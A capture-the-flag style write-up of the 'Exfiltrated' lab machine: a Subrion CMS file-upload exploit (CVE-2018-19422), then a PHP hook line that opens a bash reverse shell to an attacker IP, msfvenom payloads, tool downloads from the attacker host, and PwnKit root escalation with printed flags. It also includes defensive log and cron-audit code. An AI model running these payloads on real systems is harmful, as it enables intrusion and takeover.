OSCP Lab Machine: Exfiltrated

Key points: 1. a PHP reverse shell inserted through the CMS site map generator; 2. privilege escalation via CVE-2021-4034; 3. privilege escalation via a root cron job [CVE-2021-22204].

1. nmap scan

```bash
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 192.168.155.163 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-13 13:03 EDT
Nmap scan report for 192.168.155.163
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.55 seconds
```

2. user priv

2.1 Admin panel found [login with default password]: CMS version Subrion CMS v4.2.1

```bash
## Logged in with the default credentials admin:admin (found via Google):
http://exfiltrated.offsec/panel/

##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit  Subrion CMS       
Subrion CMS 4.2.1 - Arbitrary File Upload                                                                 | php/webapps/49876.py

##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/49876.py    
  Exploit: Subrion CMS 4.2.1 - Arbitrary File Upload
      URL: https://www.exploit-db.com/exploits/49876
     Path: /usr/share/exploitdb/exploits/php/webapps/49876.py
    Codes: CVE-2018-19422
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (956)
Copied to: /root/Desktop/49876.py


### CVE-2018-19422 RCE
┌──(root㉿kali)-[~/Desktop]
└─# python 49876.py -u http://exfiltrated.offsec/panel -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://exfiltrated.offsec/panel
[+] Success!
[+] Got CSRF token: mIUPOKjwTfQPSpbvwSNQoSfM7K7KeBVCDNxFFht0
[+] Trying to log in...

[x] Login failed... Check credentials

┌──(root㉿kali)-[~/Desktop]
└─# python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: RBz9SBrREPnzSJo5U5xTjm4B1W12UmYXf4yGHIp0
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: duglezaogvkkmhi

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/duglezaogvkkmhi.phar 

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
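From the defender's side, the upload bypass above leaves a clear trace: a web server that should only serve images from /panel/uploads/ starts answering requests for a `.phar` file. The following is an added example (not from the original writeup or the Subrion project) that runs that check over constructed Apache access-log lines modelled on the exploit run; the log lines, the extension list and the summary helper are assumptions.

```python
import re
from posixpath import splitext

# Constructed Apache combined-format log lines modelled on the exploit run above:
# login to /panel/, an upload to the panel's file manager, then two hits on the .phar
# webshell, plus benign traffic that must not be flagged.
SAMPLE_LOG = """\
192.168.45.216 - - [13/Mar/2024:13:10:01 -0400] "POST /panel/login/ HTTP/1.1" 302 216 "-" "python-requests/2.31.0"
192.168.45.216 - - [13/Mar/2024:13:10:02 -0400] "POST /panel/uploads/ HTTP/1.1" 200 412 "-" "python-requests/2.31.0"
192.168.45.216 - - [13/Mar/2024:13:10:03 -0400] "GET /panel/uploads/duglezaogvkkmhi.phar?cmd=id HTTP/1.1" 200 64 "-" "python-requests/2.31.0"
192.168.45.216 - - [13/Mar/2024:13:10:05 -0400] "GET /panel/uploads/duglezaogvkkmhi.phar?cmd=whoami HTTP/1.1" 200 52 "-" "python-requests/2.31.0"
10.11.1.5 - - [13/Mar/2024:13:12:40 -0400] "GET /panel/uploads/logo.png HTTP/1.1" 200 9321 "-" "Mozilla/5.0"
10.11.1.5 - - [13/Mar/2024:13:12:41 -0400] "GET /uploads/banner.php HTTP/1.1" 200 90 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, identd, user, [timestamp], "METHOD path proto", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

# Extensions Apache's PHP handler commonly executes; .phar is the one the CVE-2018-19422
# exploit used to get past the upload filter. Assumed list, extend for your handler config.
EXECUTABLE_EXT = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}

# Upload directory of the Subrion admin panel, taken from the webshell path above.
UPLOAD_PREFIX = "/panel/uploads/"


def executable_upload_hits(log_text: str) -> list[dict]:
    """One finding per request for an executable-looking file under the upload directory."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                     # not a parseable access-log line
        path = m.group("path").split("?", 1)[0]          # drop the query string (?cmd=...)
        if not path.startswith(UPLOAD_PREFIX):
            continue                                     # only the upload folder is in scope
        if splitext(path)[1].lower() in EXECUTABLE_EXT:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": path, "status": int(m.group("status"))})
    return findings


def summarize_by_ip(findings: list[dict]) -> dict:
    """Count webshell requests per client address, for a quick triage view."""
    counts: dict = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts
```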

Note:

2.2 Interactive shell [reverse shell via CMS site map generation]

```bash
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80     

┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.216 LPORT=443 -f elf -o shel443.elf

##
$ curl -o /var/www/html/subrion/zcmd.php http://192.168.45.216/zcmd.php

##
$ curl -o /tmp/linpeas.sh http://192.168.45.216/linpeas.sh

$ ls -al /tmp
total 820
drwxrwxrwt  2 root     root       4096 Mar 13 17:47 .
drwxr-xr-x 20 root     root       4096 Jan  7  2021 ..
-rw-r--r--  1 www-data www-data 830030 Mar 13 17:47 linpeas.sh

$ chmod +x /tmp/linpeas.sh

$ ls -al /tmp
total 820
drwxrwxrwt  2 root     root       4096 Mar 13 17:47 .
drwxr-xr-x 20 root     root       4096 Jan  7  2021 ..
-rw-r--r--  1 www-data www-data 830030 Mar 13 17:47 linpeas.sh
```

Using a reverse webshell:

None of the methods above produced a reverse shell, so I checked the writeup: https://lipa.tech/posts/pg-exfiltrated/

It shows another way to get one: System -> Hooks -> sitemapGeneration -> insert the code below -> Save -> start an nc listener on Kali -> click Generate Sitemap and the shell calls back.

Site Map Generator -> insert the PHP code -> click Generate Sitemap and the reverse shell connects:

```php
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.45.178/80 0>&1'");
```

3. root priv

3.1 Privilege escalation via CVE-2021-4034:

```bash
## linpeas.sh enumeration:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    bash /opt/image-exif.sh

##
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

### Privilege escalation with CVE-2021-4034
www-data@exfiltrated:/tmp$ wget http://192.168.45.178:8000/CVE-2021-4034.py
wget http://192.168.45.178:8000/CVE-2021-4034.py
--2024-03-14 03:04:52--  http://192.168.45.178:8000/CVE-2021-4034.py
Connecting to 192.168.45.178:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: 'CVE-2021-4034.py'

CVE-2021-4034.py    100%[===================>]   3.19K  --.-KB/s    in 0.001s  

2024-03-14 03:04:53 (4.64 MB/s) - 'CVE-2021-4034.py' saved [3262/3262]

www-data@exfiltrated:/tmp$ chmod +x ./CVE-2021-4034.py
chmod +x ./CVE-2021-4034.py
www-data@exfiltrated:/tmp$ python3 ./CVE-2021-4034.py
python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
# whoami
whoami
root
# uname -a
uname -a
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
# cat /root/proof.txt
cat /root/proof.txt
7c08fe47f1fdddee1970c01bc246be58
# ls /home/
ls /home/
coaran
# cat /home/coaran/local.txt
cat /home/coaran/local.txt
5e686fd428f8c1db63fa9cb98adcda52
```

3.2 CVE-2021-22204 [exiftool] combined with a root cron job for privilege escalation [the cron job invokes a vulnerable open-source tool]

https://lipa.tech/posts/pg-exfiltrated/#escalation
https://al1z4deh.medium.com/proving-grounds-exfiltrated-cbf5a3209865
https://github.com/mr-tuhin/CVE-2021-22204-exiftool
https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b
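The root cause on the defensive side is visible in the linpeas output above: a root cron job running every minute that hands files to an unpatched ExifTool. The following is an added example (not from the original post or the referenced writeups) that audits that crontab text for non-stock root jobs and checks an `exiftool -ver` string against 12.24, the ExifTool release that fixed CVE-2021-22204; the crontab is reconstructed from the linpeas listing and the version strings are constructed.

```python
# Crontab text reconstructed from the linpeas output above (system crontab format:
# five schedule fields, a user field, then the command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    bash /opt/image-exif.sh
"""

# Entries every stock Debian/Ubuntu system crontab carries; any other root job is
# worth review, especially when it processes files that users can write.
STOCK_COMMANDS = ("run-parts --report /etc/cron.",)


def root_custom_jobs(crontab: str) -> list[dict]:
    """Return the non-stock jobs that run as root, flagging every-minute schedules."""
    jobs = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                   # blank, comment or VAR=value line
        if line.startswith("@"):                       # @reboot/@daily style schedule
            parts = line.split(None, 2)
        else:                                          # five schedule fields
            parts = line.split(None, 6)
            parts = [" ".join(parts[:5])] + parts[5:]
        if len(parts) != 3:
            continue                                   # malformed entry
        schedule, user, command = parts
        if user != "root" or any(s in command for s in STOCK_COMMANDS):
            continue
        jobs.append({"schedule": schedule, "command": command,
                     "every_minute": schedule == "* * * * *"})
    return jobs


def exiftool_patched(version: str) -> bool:
    """CVE-2021-22204 (code execution via crafted DjVu metadata) was fixed in ExifTool
    12.24; compare the `exiftool -ver` output against that release."""
    major, minor = (int(x) for x in version.strip().split(".")[:2])
    return (major, minor) >= (12, 24)
```

A job that both shows up here and calls a tool for which `exiftool_patched()` is false is exactly the combination this section describes; the durable fix is to patch the tool and run the job as an unprivileged user.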

4. Summary:

Writeups:
https://lipa.tech/posts/pg-exfiltrated/
https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b